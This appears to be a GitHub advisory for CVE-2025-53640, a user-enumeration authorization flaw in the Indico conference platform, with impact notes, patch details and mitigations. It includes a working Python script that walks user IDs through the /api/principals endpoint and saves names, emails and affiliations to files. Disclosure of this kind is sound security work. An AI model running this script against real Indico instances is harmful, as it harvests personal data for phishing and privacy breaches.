# CVE-2025-53640 – Authenticated User Enumeration in CERN's Indico (BOLA Vulnerability)
<img width="506" height="195" alt="2025-07-19_11-19" src="https://github.com/user-attachments/assets/eb0ea6ce-1fbf-4fe7-86a5-ee9eede84d05" />


![CVE Badge](https://img.shields.io/badge/CVE-2025--53640-red)

PoC and technical analysis of CVE-2025-53640: a Broken Object Level Authorization (BOLA) vulnerability in Indico enables authenticated user enumeration via endpoint, exposing names, emails, and affiliations. Includes exploitation script, request analysis, and screenshots. Affects globally deployed Indico instances (European Organization for Nuclear Research (CERN), United Nations (UN), Massachusetts Institute of Technology (MIT), European Space Agency (ESA), among others).

## Description

A Broken Object Level Authorization (BOLA) vulnerability in the open-source application _Indico_ allows mass user enumeration through the endpoint.

Originally intended to resolve user IDs in specific form fields, this endpoint can be misused to retrieve personal details of **any valid user ID**:

- Full name
    
- Email address
    
- Title
    
- Affiliation
    
- Avatar URL
    

The vulnerability was reported and acknowledged by Indico’s maintainers, and is officially tracked as [CVE-2025-53640](https://nvd.nist.gov/vuln/detail/CVE-2025-53640)

## Exploitation Requirements

- A valid authenticated session is required.
    
- However, most public Indico instances allow self-registration with no email verification, CAPTCHA, or manual approval.
    
- This makes the vulnerability **practically exploitable by unauthenticated users** after trivial account creation.
    

## Global Impact

Indico is a widely adopted event and conference management platform developed by CERN (European Organization for Nuclear Research), powering academic and institutional infrastructure globally:

- **CERN (European Organization for Nuclear Research):** Over 900,000 events annually; 200+ rooms booked daily.
    
- **Worldwide:** Around 145,000 events/year across 300+ institutions.
    
- **UN (United Nations):** Over 180,000 participants/year.
    
- **UNOG (United Nations Office at Geneva):** Up to 700,000 users/year.
    
- Extensively used by universities, laboratories, research institutes, and government agencies.
    

Examples of affected public instances:

- [https://indico.cern.ch](https://indico.cern.ch)
    
- [https://indico.esa.int](https://indico.esa.int)
    
- [https://indico.mit.edu](https://indico.mit.edu)
    
Due to its widespread adoption in **scientific, academic, and governmental** environments, this vulnerability poses serious risks:

- Identity leakage of researchers, staff, and administrators
    
- Large-scale privacy breaches and institutional directory exposure
    
- Targeted reconnaissance for phishing or social engineering
    
- Potential compromise of sensitive research and policy initiatives
    

## Impact

- Disclosure of personal data (PII)
    
- Enumeration of high-privilege users (admins, organizers)
    
- Supports mass phishing and spear-phishing operations
    
- Violates regulations such as **GDPR**, **LGPD**, and internal institutional policies
    
- May constitute a reportable breach depending on jurisdiction
    

## Patch

The issue was fixed in **Indico v3.3.7**.

According to the maintainers, the endpoint’s behavior was adjusted to prevent dumping of user data (name, affiliation, and email) in bulk via predictable IDs. A new configuration flag `ALLOW_PUBLIC_USER_SEARCH` was also introduced.

Additional mitigations include:

- Restricting registration email checks
    
- Disabling person link resolution when public search is disabled
    
- Adding UI warnings for events with no ACL under restricted search
    

## Proof of Concept (PoC)

### Exploit

```python
#!/usr/bin/env python3
import requests
import json
import csv
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url = "https://indico.<URL>/api/principals"
headers = {
    "Cookie": "indico_session=YOUR_SESSION_COOKIE_HERE",
    "Content-Type": "application/json",
    "X-Csrf-Token": "YOUR_CSRF_TOKEN_HERE"
}

def enumerate_users(max_errors=10):
    user_id = 1
    errors = 0
    results = []

    while errors < max_errors:
        payload = {"values": [f"User:{user_id}"]}
        response = requests.post(url, headers=headers, data=json.dumps(payload), verify=False)

        if response.status_code == 200:
            data = response.json()
            key = f"User:{user_id}"
            if key in data and not data[key].get("invalid", True):
                user = data[key]
                print(f"[+] ID {user_id}: {user['first_name']} {user['last_name']} - {user['email']}")
                results.append({
                    "user_id": user_id,
                    "name": f"{user['first_name']} {user['last_name']}",
                    "email": user["email"],
                    "affiliation": user["affiliation"],
                    "title": user["title"],
                    "avatar_url": user["avatar_url"]
                })
                errors = 0
            else:
                print(f"[-] ID {user_id}: Invalid")
                errors += 1
        else:
            print(f"[!] ID {user_id}: HTTP Error {response.status_code}")
            errors += 1
        user_id += 1

    with open("enumerated_users.json", "w", encoding="utf-8") as jf:
        json.dump(results, jf, indent=2, ensure_ascii=False)

    with open("enumerated_users.csv", "w", newline="", encoding="utf-8") as cf:
        writer = csv.DictWriter(cf, fieldnames=["user_id", "name", "email", "affiliation", "title", "avatar_url"])
        writer.writeheader()
        writer.writerows(results)

    print("Enumeration finished.")

if __name__ == "__main__":
    enumerate_users()
```
<img width="598" height="396" alt="image" src="https://github.com/user-attachments/assets/748669a7-72e5-4d2f-aeb3-f13f8fc8c50a" />
<img width="601" height="725" alt="image" src="https://github.com/user-attachments/assets/93505671-60cb-40fd-aeaf-5559d3bd0ff0" />


## Mitigation Tips

- Restrict access to endpoint based on role or context
    
- Set `ALLOW_PUBLIC_USER_SEARCH = false` in `indico.conf`
    
- Limit exposed user fields to only what's necessary
    
- Disable or restrict self-registration (e.g., email verification, admin approval)
    
- Enable monitoring and rate-limiting on the endpoint
    
- Upgrade to **Indico 3.3.7** or newer immediately
    
- Monitor access logs for enumeration patterns
    

## CVE

Official ID: [**CVE-2025-53640**](https://nvd.nist.gov/vuln/detail/CVE-2025-53640)

## Disclosure

This vulnerability was discovered during a security assessment conducted as part of the **Red Team Residency Program at RNP (Rede Nacional de Ensino e Pesquisa – Brazil)**.

All research and testing were performed with prior authorization and oversight. Special thanks to the **RNP Security Team** for providing ethical guidance and infrastructure support.

This CVE underscores the importance of enforcing strict object-level access control in platforms that manage sensitive institutional data.

## References

- [GitHub Security Advisory – GHSA-q28v-664f-q6wj](https://github.com/indico/indico/security/advisories/GHSA-q28v-664f-q6wj)
    
- [Indico Commit f858355](https://github.com/indico/indico/commit/f8583557a3da56aeea8857ae69bf17c9066c95c1)
    
- [NVD Record](https://nvd.nist.gov/vuln/detail/CVE-2025-53640)
    
- [CVE.org Registry](https://www.cve.org/CVERecord?id=CVE-2025-53640)
    
- [Indico Config: ALLOW_PUBLIC_USER_SEARCH](https://docs.getindico.io/en/stable/config/settings/#ALLOW_PUBLIC_USER_SEARCH)
    
- [Indico Upgrade Guide](https://docs.getindico.io/en/stable/installation/upgrade/)
    
- [Release Notes – v3.3.7](https://github.com/indico/indico/releases/tag/v3.3.7)
